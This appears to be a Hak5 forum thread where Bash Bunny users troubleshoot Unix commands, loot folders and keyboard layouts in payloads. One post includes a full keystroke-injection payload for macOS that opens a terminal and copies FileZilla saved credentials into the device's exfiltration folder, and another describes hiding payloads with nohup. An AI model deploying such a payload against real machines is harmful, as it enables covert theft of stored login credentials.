Jump to content

Payload and unix command


quentin.lamamy
 Share

Recommended Posts

Hi there,

I have a little question, i love my bash bunny, create a lot of payloads (i will post them when really finished), but still have some question.

Actually for all my payload i open a terminal, minimize it and do my stuff. When i look at this kind of payload , on line 24 there is a unix command "mkdir". So, it's possible to use unix command without a terminal ?

Reminder for people who read this topic, working unix command in payload :

mkdir
source
export

 

Edited by quentin.lamamy
Link to comment
Share on other sites

1 hour ago, quentin.lamamy said:

There is a list somewhere ? I can't find this information on the wiki

That's because it's not on the Wiki. Think about it - the Bash Bunny is a Linux computer in a USB, therefore it uses bash/sh, meaning any bash/sh commands will work (well, most of them, at least). Therefore just Google stuff like this..

Link to comment
Share on other sites

Thks for the tutorial... and the respect..... I'm not aware of the internal software and hardware of the BB.

Just tell me that bb is a linux computer in a USB key, it's enough , i don't need help to know the command list available on unix, and i don't need your disdain.

Link to comment
Share on other sites

56 minutes ago, quentin.lamamy said:

Thks for the tutorial... and the respect..... I'm not aware of the internal software and hardware of the BB.

Just tell me that bb is a linux computer in a USB key, it's enough , i don't need help to know the command list available on unix, and i don't need your disdain.

I wasn't disrespecting you, sorry if it seemed that way.

You asked for a command list after I stated that the BB was a Linux box on a stick, so I just helped point you in the right direction - Google a list of commands. :)

Hope it helped in the end. While I said that you can find a list of commands, I also said that some may not work (most will work), so the best way to find out is to test them. Obviously don't do commands that may brick your Bunny or break something..

 

Edited by Dave-ee Jones
Link to comment
Share on other sites

Ok, hoist the white flag xD

I just try try this command

mkdir -p /root/udisk/loot/exfiltration

nothing, no folder, a total void ^^

but if i use this command

Q STRING mkdir -p /Volumes/BashBunny/loot/exfiltration
Q ENTER

it work's \o/

for me it's the same, i just want to understand where is my mistake.

Thks

Edited by quentin.lamamy
Link to comment
Share on other sites

Where are you posting the Ducky script? In your SSH/Serial shell for the Bunny or..?

In regards to your first try, "/root/udisk" doesn't actually refer to your USB storage while in Arming mode. However, if you decided to write a payload that did this..

LED Y # Make LED yellow to start
mkdir -p "/root/udisk/loot/exfiltration" # Makes the directory
if [ -d "/root/udisk/loot/exfiltration" ] # Checks for the directory
then
 LED G # If the directory exists turn the LED green
fi

And then went back into Arming mode, you will notice the folder is there. Also, the LED should have gone green during the payload too.

Also, your code did work however you just can't see the directory in the USB storage. If you check for that directory (or even 'cd' to it) in the serial console where you called it you will notice it actually does exist. It's a bit weird how it works - you just have to think of USB storage and 'udisk' as 2 different things.

You can use the "udisk mount" and "sync" commands to sync the 'udisk' and USB storage.

 

EDIT: I did the same thing you did (created the directory in the serial console), then rebooted my Bunny and the folder was there in USB storage. I would say you need to sync it before you try and access it on USB storage.

Edited by Dave-ee Jones
Link to comment
Share on other sites

20 minutes ago, Dave-ee Jones said:

Where are you posting the Ducky script? In your SSH/Serial shell for the Bunny or..?

it's just in my switch1 folder like any other payload (not in serial console)  And i test this weird path because i see it in this payload  (when i don't have enough documentation or data, i try to learn from the existing script). But it seems that it's not the good way to create a folder (before moving file inside during exfiltration)

Edited by quentin.lamamy
Link to comment
Share on other sites

1 minute ago, quentin.lamamy said:

it's just in my switch1 folder like any other payload (not in serial console)  And i test this weird path because i see it in this payload  (when i don't have enough documentation or data, i try to learn from the existing script). But it seems that it's not the good way to create a folder (before moving file inside during exfiltration)

Aha, that's how everyone learns :P

But did it work for you? You may have to play around a bit for it to update live in Windows Explorer, but using it in a payload works fine. E.g. I can create a folder using "mkdir -p" and put/get files from it as I need, it just doesn't show the folder in Windows Explorer initially - you would have to sync it and "udisk mount" (don't quote me on the mounting part - I'm not actually sure how that works, I did once upon a time when I needed to use it for a payload but now I've forgotten).

Link to comment
Share on other sites

I spent all weekend looking through those payloads figuring out which one I should update.  I got overwhelmed.  Going to just need people to suggest which one needs looking over the most and start there.

Summary.  The BB is a Arm machine running linux.  It has its root partition that it boots from and a nang (i think it is called that) that is usually mapped as udisk for payloads and exfiltrated data.  If you make a payload with just a network connection you can ssh into it and explore it.

The BB comes with some helpers for you.  Like in the shell it has the udisk command to mount and format the partition that is mounted and payloads are ran from.  For the payloads themselves there are helper functions to get you ip address of the bunny and clients, switch position, and hostnames.  The wiki has their uses.

 

I looked in the past for a way to run my payloads hidden in linux and found a way but it works best when the payload is encompassed into a script ie python, perl, bash, whatever.

The key here is the nohup command in linux.  I do not know if it is there in MacOS but I always seen it in linux.  If I use it like so against my payload script it will be.

nohup bash ./myscript.sh &
exit

nohup keeps your script from closing when you close the terminal.  Of course you can only see the process in "top", if it is still running.  It also writes all output to a nohup.not file.

I have foudn that while prethinking of a way to make an agent run hidden on linux since I had no takers on writing the python agent for the BBTPS for linux and OSX, I am going to have to do it as soon as I figure out how to run a separate process from python detached from the current python instance (like start-process in powershell for windows).

Link to comment
Share on other sites

6 hours ago, PoSHMagiC0de said:

I spent all weekend looking through those payloads figuring out which one I should update.  I got overwhelmed.  Going to just need people to suggest which one needs looking over the most and start there.

Summary.  The BB is a Arm machine running linux.  It has its root partition that it boots from and a nang (i think it is called that) that is usually mapped as udisk for payloads and exfiltrated data.  If you make a payload with just a network connection you can ssh into it and explore it.

The BB comes with some helpers for you.  Like in the shell it has the udisk command to mount and format the partition that is mounted and payloads are ran from.  For the payloads themselves there are helper functions to get you ip address of the bunny and clients, switch position, and hostnames.  The wiki has their uses.

 

I looked in the past for a way to run my payloads hidden in linux and found a way but it works best when the payload is encompassed into a script ie python, perl, bash, whatever.

The key here is the nohup command in linux.  I do not know if it is there in MacOS but I always seen it in linux.  If I use it like so against my payload script it will be.


nohup bash ./myscript.sh &
exit

nohup keeps your script from closing when you close the terminal.  Of course you can only see the process in "top", if it is still running.  It also writes all output to a nohup.not file.

I have foudn that while prethinking of a way to make an agent run hidden on linux since I had no takers on writing the python agent for the BBTPS for linux and OSX, I am going to have to do it as soon as I figure out how to run a separate process from python detached from the current python instance (like start-process in powershell for windows).

That doesn't sound like it has anything to do with this guy's question..

  • Upvote 1
Link to comment
Share on other sites

Here is the result of some test

TEST 1 : Print the command in shell and press enter

rootDir=/Volumes/BashBunny
lootDir=$rootDir/loot/exfiltration/

[...]

Q STRING mkdir -p $lootDir
Q ENTER

The result : No folder creation and this result in the console

bashbunny> mkdir §p /Volumes/BashBunny/loot/exfiltration/
mkdir: §p: File exists

Why this error ? Don't know because the file doesn't exist,

And why my mkdir -p become mkdir: §p ?

 

Link to comment
Share on other sites

Okay, your keyboard language and Bunny language need to be the same. So whatever you use (us, fr, etc.) needs to be set on both systems. Using the command:

DUCKY_LANG us

should fix the Bunny up. Just set the Bunny's language to whatever the PC's language is. There's a list of supported languages in the 'language' folder on the Bunny's USB storage.

Now, in regards to the "folder exists" error, in means the folder exists ( :P ). The USB storage may not show it, but on the Bunny it exists. Why are you using Ducky script to write the command? What are you writing the command into? Did you try my quick payload to see if it is working?

18 hours ago, Dave-ee Jones said:

LED Y # Make LED yellow to start
mkdir -p "/root/udisk/loot/exfiltration" # Makes the directory
if [ -d "/root/udisk/loot/exfiltration" ] # Checks for the directory
then
 LED G # If the directory exists turn the LED green
fi

 

 

Edited by Dave-ee Jones
Link to comment
Share on other sites

You can see all the files on USB storage when you do this in the serial console:

udisk mount # unlocks USB storage in console
cd /root/udisk/ # go to the USB storage
ls # lists all the files/folders in the current directory

Just tested that, works good. From there you can "mkdir" and stuff, then call "sync" at the end and everything updates fine, after you've rebooted.

You may also notice that everything works fine in a normal payload, you wouldn't normally have to do a udisk mount and a sync everytime. You can write to a file in the loot directory and once the payload has completed, just call "sync" and once the payload has finished go back to arming mode and your exfiltration stuff is sitting right there.

Edited by Dave-ee Jones
Link to comment
Share on other sites

Just try and yes tadaa i have my folder, but in my case it don't work ?

#!/bin/bash
###############################################################################
#           _____  _____  _____  _____     _____  _____  _____  _____  __ __  #
# (\___/)  | __  ||  _  ||   __||  |  |   | __  ||  |  ||   | ||   | ||  |  | #
# (='.'=)  | __ -||     ||__   ||     |   | __ -||  |  || | | || | | ||_   _| #
# (")_(")  |_____||__|__||_____||__|__|   |_____||_____||_|___||_|___|  |_|   #  
#                           Bash Bunny by Hak5 USB Attack/Automation Platform #
#                                                                             #
###############################################################################
#                                                                             #
# Title:         Filezilla credential exfiltration                            #
# Author:        Quentin Lamamy <contact@quentin-lamamy.fr>                   #
# Description    Exfiltrate filezilla credential                              #
# Version:       1.0                                                          #
# Platform       OSX                                                          #
#                                                                             #
###############################################################################


#####################
# Setup the payload #
#####################

LED SETUP
rootDir=/Volumes/BashBunny
lootDir=$rootDir/loot/exfiltration/filezilla
DUCKY_LANG fr
GET SWITCH_POSITION
ATTACKMODE HID STORAGE

#####################
# Attack the target #
#####################

LED ATTACK

Q CTRL SPACE
Q STRING terminal
Q ENTER		

Q STRING source $rootDir/payloads/$SWITCH_POSITION/shell.sh
Q ENTER

Q STRING shell.init
Q ENTER

Q STRING mkdir -p $lootDir
Q ENTER

Q STRING source $rootDir/payloads/$SWITCH_POSITION/filezillaExfiltration.sh;
Q ENTER

Q STRING filezilla.exfiltration $lootDir
Q ENTER

#Q STRING clear
#Q ENTER

QUACK STRING source $rootDir/payloads/$SWITCH_POSITION/footer.sh
QUACK ENTER

# Close terminal
#QUACK STRING killall Terminal
#QUACK ENTER

LED FINISH
#################################################################################
# (\___/)      Find further documentation, repository of payloads,      (\___/) #
# (='.'=)      tutorial videos and community support forums at          (='.'=) #
# (")_(")      bashbunny.com. (C) Hak5 LLC                              (")_(") #
#################################################################################
cp: /Volumes/BashBunny/loot/exfiltration/filezilla/quentin_sitemanager.xml: No such file or directory

 

It's not the better way to do QUACK mkdir ..... and QUACK ENTER, but it should work no ?

Edited by quentin.lamamy
Link to comment
Share on other sites

I don't understand why you are Ducky scripting your "mkdir", you don't need to. The Bash Bunny is a Linux box, therefore saying 

mkdir -p $lootDir 

says "Make a directory in this folder called this: 'exfiltration'".

However, doing it like you are doing it

Q STRING mkdir -p $lootDir

is just writing that in a selected textbox. So unless the selected textbox is a SSH/Serial console in the Bunny this isn't going to work.

So it is in a Terminal, therefore this COULD work however you must remember that any command you make is being executed on your PC, not the Bunny. I don't have a Mac so I can't test this or see anything that may be wrong with your Terminal stuff.

No where does it show Quentin_Sitemanager.xml being created so I am assuming that is in one of your *.sh files? You should look at those. Also, check to make sure that filezillaExfiltration.sh is actually being run - sourcing it might run it and then calling it might run it again. The second time you've called it it might not run correctly because it has to be executable. You should make the *.sh files log to another file, giving you regular updates of what is happening.

Edited by Dave-ee Jones
Link to comment
Share on other sites

21 hours ago, Dave-ee Jones said:

Okay, that's good news. You might notice you can do other things like for loops, while loops, switches, etc. Normal Bash programming stuff :P

Yes all this classic command will work, i try all the "uncommon" command and try them to help the future BB noob like me

Next unix command test : export

export FOO="BAR"
Q STRING $FOO

# Will print, as expected BAR in the current focused window

export PS1="bashbunny>"

# Will do nothing

I have little idea on why it don't change my terminal prompt, it may be a kind of scope issue. Something like the var is set for the actual running script on the BB and not for the current opened terminal.

I use to success to make this work with Q STRING en Q ENTER, but now it sucks with some encoding issue

# Print this command in terminal in order to be in the "good scope"
Q STRING "export PS1='bashbunny >'"
Q ENTER

but the unexpected result is

export PS1-'bashbunny #'

encoding PB solve with a new OSX keyboard layout

Edited by quentin.lamamy
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...